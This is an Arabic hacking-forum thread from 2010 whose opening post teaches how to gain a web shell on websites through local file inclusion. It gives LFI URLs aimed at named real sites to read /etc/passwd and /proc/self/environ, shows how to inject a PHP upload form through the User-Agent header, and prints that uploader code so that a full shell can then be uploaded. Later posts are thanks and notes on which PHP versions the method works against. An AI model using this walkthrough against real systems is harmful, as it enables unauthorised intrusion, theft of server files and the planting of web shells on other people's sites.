التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-29-2010, 01:54 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم عن الحصول على شل عن طريق ثغرات local file include

طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات

ولو دخلت على اى موقع ثغرات تلقاها اكتر من السكيول

لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير

وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها

عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر

الأدوات الأول

1 - متصفح فير فوكس (أكيد عند كله)

2 - إضافة mozilla sniffer

https://addons.mozilla.org/en-US/firefox/addon/176005/

3 - فتح دماغك معايا شويه بس

نبدأ الشرح

ده مثال لموقع مصاب بثغرة lfi

http://www.iowaarboretum.org/index.p.../etc/passwd%00

وده موقع للتطبيق فى حالتنا

http://falalalalights.net/site/index...elf/environ%00

على سبيل المثال لا الحصر

نشوف هنعمل ايه

أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم)

المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت

احنا بقى هنعمل ايه

هنحقن المجلد ده بشل بسيط الاوا
وعن طريق الشل البسيط نرفع شل كبير

نشوف ازاى

ده المسار اللى بنجيب منه اليوزرات

http://www.site.com/index.php?option.../etc/passwd%00

وخلى بالك من علامة %00 اللى فى الاخر دى

مهمه جدا

طيب بعد منطلب الملف ده النتيجه هتبقى كده

[

تمام لحد كده الموقع مصاب وزى الفل

نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات

ازاى بقى يا حلو
هنغير /etc/passwd ب /proc/self/environ
http://www.site.com/index.php?option...elf/environ%00

لو كان الناتج زى كده



يبقى متفعله وزى الفل

طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت

طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه

يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه

اوك

لقيناه متفعل هنعمل ايه

نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده
مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا

كود:
<?php
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_****'], $_FILES['file']['****'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
تم ارفاق الشل

نشوف بقى هنحقنه ازاى

بعد متسطب الاداه mozilla sniffer

تفتحها من الفاير فوكس عن طريق tools > mozilla sniffer

وبعدين تضغط start sniff

طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض

اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol
طيب

ضغطنا start sniff
افتح بقى السايت تانى طبعا السايت ده

http://www.site.com/index.php?option...elf/environ%00

واختار tamper

تلقى جاك حاجه زى دى


لاحظ المحدد بازرق اللى هو user agent

حط مكانه كود الشل الموجود فوق

واتكى ok

تمام كده تلاقى الصفحه ظهر فيها فورم رفع
زى ده


لول

ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش

بعد متضغط ابلود
اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع


واضغط اوك

تمام كده انا رفعت الشل باسم faris.php

تروح بقى على السايت مباشر وتضيف يعدها اسم الشل

توضيح
انا كنت شغال هنا
http://www.site.com/index.php?option...elf/environ%00

يبقى الشل هنا

http://www.site.com/faris.php

والنتيجه



مبروووك

lol


انتهى الشرح
اتمنى يكون واضح
وأى استفسارات انا جاهز

HaCKeR-MaN k:

نسخ لصق
-------
ahmed_100022
عالم المعرفه


hgpw,g ugn ag uk 'vdr eyvhj local file include hglkjavi f;evi

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 06-29-2010, 05:11 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
D-GhosT s3cur!Ty-Z
::. Moderators .::
 
الصورة الرمزية D-GhosT s3cur!Ty-Z
 

 

 
إحصائية العضو







D-GhosT s3cur!Ty-Z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D-GhosT s3cur!Ty-Z is on a distinguished road

افتراضي


thank you

التوقيع

Palastine 4ever



يرجى من الاخوة الكرام الاطلاع على قوانين الشبكة
لكي تكون لك مشاركة رائعة مع الشبكة


http://www.vbspiders.com/vb/t71973.html

 

   

رد مع اقتباس
قديم 06-29-2010, 09:58 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Q2-FOX2R
 

 

 
إحصائية العضو






Q2-FOX2R غير متواجد حالياً

إرسال رسالة عبر MSN إلى Q2-FOX2R

 

 

إحصائية الترشيح

عدد النقاط : 10
Q2-FOX2R is on a distinguished road

افتراضي


مشكووورين على الشرح الاكثر من رائع
بس الثغرات دي صارت نادرة
و ان وجدت ما تنفع كثير
بسبب اصدار البي آتش بي 5.x

بس تزبط بالاصدار 4.x با>ن الله

التوقيع

[grade="00008B FF6347 008000 4B0082 FF0000"]
غائب بسبب الظروف و الله أعلم و أدرى بي ...
و الله آسف جدا يا شبآب[/grade]http://img23.imageshack.us/img23/1597/sp1d3er.gif





للتواصل : louze-@hotmail.com



My NeW Zone-H UndeR ConstruCtioN : http://zone-h.org/archive/notifier=Q2-FOX2R

Special Greetz T0 :
Volc4no & Every One Who Loves Q2-FOX2R

كود PHP:
<?php

$var 
= array ( "I love","Volcano"," & Stone Love"," & الشبح المرح");
foreach ( 
$var as $name )
{
echo 
$name;
}
?>
http://img197.imageshack.us/img197/3209/sp1d3er.png

اخوكم في الله
يونس
Q2-FOX2R

smilies7

 

   

رد مع اقتباس
قديم 06-29-2010, 11:08 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية the sn!per
 

 

 
إحصائية العضو







the sn!per غير متواجد حالياً

إرسال رسالة عبر MSN إلى the sn!per

 

 

إحصائية الترشيح

عدد النقاط : 10
the sn!per is on a distinguished road

افتراضي


[align=center][/align]مشكور اخ volc4no على الشرح الرائع بانتظار جديدك دائما

التوقيع

الا بذكر الله تطمئن القلوب

http://www.saaid.net/twage3/009.jpg

Sniper99@vip.cn

 

   

رد مع اقتباس
قديم 06-29-2010, 11:17 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية mobdeen
 

 

 
إحصائية العضو







mobdeen غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mobdeen is on a distinguished road

افتراضي


والله شرح وافي وكافي بس ما ينفع الا مع قليل

التوقيع

احبكم كلكم
smilies15smilies15smilies15

 

   

رد مع اقتباس
قديم 06-30-2010, 12:26 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية mr.ft
 

 

 
إحصائية العضو





mr.ft غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mr.ft is on a distinguished road

افتراضي


مشكووووووووووور يعطيك الف عافيه

   

رد مع اقتباس
قديم 09-09-2011, 04:22 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية hakar-mosos
 

 

 
إحصائية العضو





hakar-mosos غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hakar-mosos is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


مشكور اخي على المعلومه الحلوه

   

رد مع اقتباس
قديم 09-09-2011, 02:49 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Mr GbX
 

 

 
إحصائية العضو






Mr GbX غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr GbX is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


شكرا لك يا غالي

   

رد مع اقتباس
قديم 09-09-2011, 04:01 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية جيم 5
 

 

 
إحصائية العضو





جيم 5 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
جيم 5 is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


شكرا يا عسل

   

رد مع اقتباس
قديم 09-09-2011, 05:23 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية zero cool1
 

 

 
إحصائية العضو








zero cool1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
zero cool1 is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


thxxxxxxxxxxxxxxxxxxxxxxxxxx

التوقيع

http://img4.hostingpics.net/pics/217648j8pqxg.gif
Freedom for Ghazza

 

   

رد مع اقتباس
قديم 09-16-2011, 04:09 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية atttt
 

 

 
إحصائية العضو





atttt غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
atttt is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


a;vhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

   

رد مع اقتباس
قديم 09-16-2011, 06:48 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية simon007
 

 

 
إحصائية العضو





simon007 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
simon007 is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


thxxxxxxxxxxxxxxxxxxxxxxxxxx

   

رد مع اقتباس
قديم 09-17-2011, 06:38 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية pain sama
 

 

 
إحصائية العضو






pain sama غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
pain sama is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


شكراا لك حبيبي الغالي !!

   

رد مع اقتباس
قديم 09-28-2011, 05:04 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


مشكور اخي فولكانو

التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
قديم 09-29-2011, 05:02 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية ssmba
 

 

 
إحصائية العضو





ssmba غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ssmba is on a distinguished road

افتراضي رد: الحصول على شل عن طريق ثغرات local file include المنتشره بكثره


god men pro

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Uploading Shell Through Local File Inclusion ( LFI ) priv8 D4rK قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 12-09-2018 01:50 AM
كيفية رفع الشيل عبر ثغرات File Include R.B.G.ALORD قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 13 08-11-2013 05:28 AM
حقن شيل فى ثغرات SQL Injection عن طريق Into Out File Dr.Alaa SQL قواعد البيانات 3 09-13-2009 07:11 AM


الساعة الآن 01:41 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0